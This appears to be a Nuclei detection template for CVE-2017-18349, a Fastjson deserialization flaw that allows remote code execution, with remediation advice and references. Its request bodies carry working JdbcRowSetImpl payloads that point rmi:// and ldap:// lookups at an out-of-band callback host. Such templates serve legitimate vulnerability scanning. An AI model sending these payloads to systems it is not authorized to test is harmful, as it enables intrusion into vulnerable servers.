parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
PoC代码[已公开]
id: CVE-2017-18349
info:
name: Fastjson Insecure Deserialization - Remote Code Execution
author: night
severity: critical
description: |
parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi-// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
impact: |
Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
remediation: |
Update Fastjson to version 1.2.25 or later which includes security patches for this vulnerability.Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`.Implement strict whitelist filtering for `@type` annotations, validate and sanitize all JSON input.Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-18349
- https://github.com/alibaba/fastjson/wiki/security_update_20170315
- https://github.com/pippo-java/pippo/issues/466
- https://github.com/h0cksr/Fastjson--CVE-2017-18349-
- https://fortiguard.com/encyclopedia/ips/44059
- https://www.exploit-db.com/exploits/45983
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-18349
cwe-id: CWE-20
epss-score: 0.90735
epss-percentile: 0.99604
cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: alibaba
product: fastjson
tags: cve,cve2017,fastjson,deserialization,rce,oob,oast
variables:
rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"
http:
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{rmi_payload}}",
"autoCommit": true
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
- "{{BaseURL}}/parse"
- "{{BaseURL}}/deserialize"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{ldap_payload}}",
"autoCommit": true
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
- "{{BaseURL}}/api/json"
- "{{BaseURL}}/parse"
- "{{BaseURL}}/deserialize"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"data": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{rmi_payload}}",
"autoCommit": true
}
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
- method: POST
path:
- "{{BaseURL}}/json"
headers:
Content-Type: application/json
Accept: application/json
body: |
{
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "{{ldap_payload}}",
"autoCommit": true
}
}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'autoCommit','set property error')"
condition: and
extractors:
- type: kval
kval:
- interactsh_ip
# digest: 4a0a00473045022100ec29aeb993060e03a04d6c6dc6a2b86115ec98b0236f297a46ba18680032bf05022007a4c76ad8d764a70ace521db6f406d9e9b59f45410f31532b1b076c1fb9c48d:922c64590222798bb761d5b6d8e72950